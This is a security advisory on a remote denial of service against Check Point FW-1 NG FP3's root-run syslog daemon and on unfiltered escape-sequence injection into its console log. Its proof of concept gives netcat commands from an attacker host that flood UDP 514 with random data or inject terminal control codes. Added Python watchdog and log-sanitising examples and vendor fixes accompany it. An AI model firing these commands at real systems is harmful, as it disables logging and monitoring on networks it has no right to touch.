22nd Mar 2003 [SBWID-6087]
COMMAND
Check Point DoS attack against syslog daemon
SYSTEMS AFFECTED
Check Point FW-1 NG FP3 & FP3 HF1
PROBLEM
Thanks to Peter of (P) & (C) 2003 AERAsec Network Services and
Security GmbH, advisory :
http://www.aerasec.de/security/advisories/checkpoint-fw1-ng-fp3-syslog-crash.html
http://www.aerasec.de/security/index.html?id=ae-200303-064
--snip--
* Successful DoS from remote against the syslog daemon of Check Point FW-1
NG FP3 (also FP3 HF1); a remote root exploit may be possible.
* Syslog messages containing escape sequences directed to the syslog daemon
of Check Point FW-1 NG FP3 (including HF1 and HF2) remain unfiltered
and cause strange output behaviour if the log is viewed on the console.
--snip--
Check Point VPN-1/FW-1 NG FP3 contains a syslog daemon (default: off)
that redirects syslog messages received from remote hosts (e.g. routers)
into Check Point's SmartView Tracker logging mechanism. This syslog daemon
can be crashed from remote and does not start again automatically. No
watchdog service detects the crash, and no entry about the no longer
available syslog daemon appears in the SmartView Tracker.
Additionally, it prints all characters received in a syslog message from
remote without any modification: escape sequences are neither filtered
nor, for example, expanded to their octal ASCII values.
--snip--
Proof of concept
================
1
=
Start the syslog daemon by enabling it in the firewall object (and run
cpstop/cpstart afterwards) or by executing it by hand:
[firewall]# /opt/CPfw1-50-03/bin/syslog 514 all
Shutting down kernel logger: [ OK ]
Shutting down system logger: [ OK ]
Starting system logger: [ OK ]
Starting kernel logger: [ OK ]
Segmentation fault <- occurs after receiving the random syslog payload
described below
Check for the listening syslog daemon:
[firewall]# netstat -lnptu |grep -w 514
udp 0 0 0.0.0.0:514 0.0.0.0:* $pid/syslog
Note also that this daemon is running as "root":
# ps -ux | grep -w syslog
root $pid 0.0 6.8 148064 8612 ? S 12:17 0:00 syslog 514 all
Send a valid syslog message from a remote host (here also a Linux
system):
[evilhost]# echo "<189>19: 00:01:04: Test" | nc -u firewall 514
Send random payload via syslog message from a remote host:
[evilhost]# cat /dev/urandom | nc -u firewall 514
The previously started syslog daemon should crash after a short time; use
"netstat" to check whether a daemon is still listening on UDP port 514.
Note: for a clean restart of Check Point's syslog daemon the firewall
service needs to be restarted.
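The advisory stresses that nothing on the firewall notices when the syslog daemon dies: no watchdog, no SmartView Tracker entry. The Python below is a minimal watchdog for that gap, added here as an example and not Check Point's or AERAsec's code. It parses `netstat -lnptu` output for a UDP socket bound to port 514 held by a process named syslog, which is exactly the check the advisory does by hand with `netstat ... | grep -w 514`. The two netstat samples are constructed to look like the advisory's output line; the PIDs and the sshd row are invented. Running it live assumes a `netstat` that prints the PID/Program column, i.e. it is run as root.

```python
import subprocess
import sys

SYSLOG_PORT = 514

# Constructed sample output of `netstat -lnptu`, modelled on the advisory's
# "udp 0 0 0.0.0.0:514 0.0.0.0:* $pid/syslog" line; PIDs are invented.
NETSTAT_DAEMON_UP = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
udp        0      0 0.0.0.0:514             0.0.0.0:*                           1234/syslog
"""

# Same host after the daemon has segfaulted: the UDP 514 row is gone and
# nothing else on the box says so.
NETSTAT_DAEMON_DOWN = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
"""


def udp_listeners(netstat_output, port):
    """Return the PID/Program fields of UDP sockets bound to `port`."""
    found = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # udp/udp6 rows: Proto Recv-Q Send-Q Local Foreign [State] PID/Program
        if len(fields) < 5 or not fields[0].startswith("udp"):
            continue
        # Local address is host:port; split on the last colon so an IPv6
        # wildcard such as :::514 is handled as well.
        local_port = fields[3].rsplit(":", 1)[-1]
        if local_port == str(port):
            found.append(fields[-1])
    return found


def syslog_daemon_up(netstat_output, port=SYSLOG_PORT):
    """True if a process named 'syslog' still holds UDP `port`."""
    return any(prog.endswith("/syslog")
               for prog in udp_listeners(netstat_output, port))


def check_live(port=SYSLOG_PORT):
    """Run netstat on this host and return (daemon_up, raw_netstat_output)."""
    proc = subprocess.run(["netstat", "-lnptu"], capture_output=True,
                          text=True, check=False)
    return syslog_daemon_up(proc.stdout, port), proc.stdout


if __name__ == "__main__":
    # Exit status 1 when the listener is gone, so cron or a monitoring
    # agent can raise the alert the product itself does not.
    up, _ = check_live()
    print("syslog daemon listening on UDP %d: %s"
          % (SYSLOG_PORT, "yes" if up else "NO"))
    sys.exit(0 if up else 1)
```

Because the advisory also notes that the daemon needs a full firewall service restart to come back cleanly, the script only reports; restarting is left to the operator.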
2
=
Enable receiving of syslog from remote by FW-1, e.g. as described
above.
View the log on the console by running the following command:
[firewall]# fw log -tfnl
Send some special escape sequences via syslog, e.g.:
[evilhost]# echo -e "<189>19: 00:01:04:Test\a\033[2J\033[2;5m\033[1;31mHACKER~ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
Take a look at the console again, but don't be scared too much for
now... Press CTRL-C and reset the console to its default state by executing:
[firewall]# reset
Attackers might send a lot of "special" escape sequences; for Linux as
the destination see "man console_codes" for more.
Note: the standard syslog daemon on a RHL 7.3 system renders such input
as shown here:
Mar 14 13:29:30 linuxbox 19: 00:01:04: Test^G^[[2J^[[2;5m^[[1;31mHACKER ATTACK ^[[2;25m^[[22;30m^[[3q
SOLUTION
Solutions to prevent the successful DoS attack against the syslog service:
- Upgrade to FP3 HF2 (available since 14 March 2003) as soon as possible;
for more information see:
http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html
- Customize your ruleset so that the enforcement module accepts syslog
messages only from dedicated (and trusted, see below) senders
Solutions to prevent unfiltered console output:
- Filter the log output using "tr", e.g.:
[firewall]# fw log -tfnl | tr '\000-\011\013-\037\200-\377' '*'
(all characters with decimal ASCII codes 0-31 and 128-255, except 10
for LF, are replaced by a '*')
- Update Check Point's syslog daemon again when a newer version becomes
available:
http://www.checkpoint.com/techsupport/alerts/syslog.html
- Improve the ruleset as suggested above.
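The "tr" workaround above and the caret rendering shown for the RHL 7.3 syslogd are the two sensible things to do with control characters before a syslog message reaches a console or a log forwarder. The Python below is an added example, not Check Point's or AERAsec's code: mask_control_chars mirrors the tr ranges byte for byte (0-31 and 128-255 except LF; DEL, decimal 127, lies outside those ranges and therefore passes, exactly as with the tr command), caret_escape renders the same bytes visibly the way the syslogd line above does (^G, ^[, and octal for bytes above 127), and has_control_chars flags a message so a forwarder can alert on it instead of silently cleaning it. The sample message is constructed after the advisory's escape-sequence payload.

```python
# Constructed sample, modelled on the advisory's escape-sequence payload:
# BEL, clear-screen, blink, bold red text, and a cursor-shape sequence.
SAMPLE_MESSAGE = (
    b"<189>19: 00:01:04:Test\a\x1b[2J\x1b[2;5m\x1b[1;31mHACKER ATTACK"
    b"\x1b[2;25m\x1b[22;30m\x1b[3q"
)

LF = 0x0A


def _passes_tr_filter(byte):
    """Bytes the advisory's tr filter leaves untouched: LF and 32-127.
    Note that DEL (127) is not in the tr ranges and so is kept, too."""
    return byte == LF or 0x20 <= byte < 0x80


def mask_control_chars(payload, replacement=b"*"):
    """Equivalent of: tr '\\000-\\011\\013-\\037\\200-\\377' '*'"""
    return b"".join(bytes([b]) if _passes_tr_filter(b) else replacement
                    for b in payload)


def caret_escape(payload):
    """Render control bytes visibly, as the RHL 7.3 syslogd output shows:
    0x07 -> ^G, 0x1b -> ^[, 0x7f -> ^?, bytes >= 128 -> \\ooo (octal)."""
    out = []
    for b in payload:
        if b == LF or 0x20 <= b < 0x7F:
            out.append(chr(b))
        elif b < 0x20:
            out.append("^" + chr(b + 0x40))   # control char -> ^<letter>
        elif b == 0x7F:
            out.append("^?")
        else:
            out.append("\\%03o" % b)           # high bytes as octal escapes
    return "".join(out)


def has_control_chars(payload):
    """True if the message would be altered by the tr filter; useful as an
    alert condition in a syslog forwarder."""
    return any(not _passes_tr_filter(b) for b in payload)


if __name__ == "__main__":
    print(mask_control_chars(SAMPLE_MESSAGE).decode("ascii"))
    print(caret_escape(SAMPLE_MESSAGE))
    print("control characters present:", has_control_chars(SAMPLE_MESSAGE))
```

mask_control_chars is the right filter for a console pipeline, since it loses nothing a human reads; caret_escape is the better choice for stored logs, because the original bytes remain recoverable and the ^[ sequences are what an analyst expects to see from syslogd.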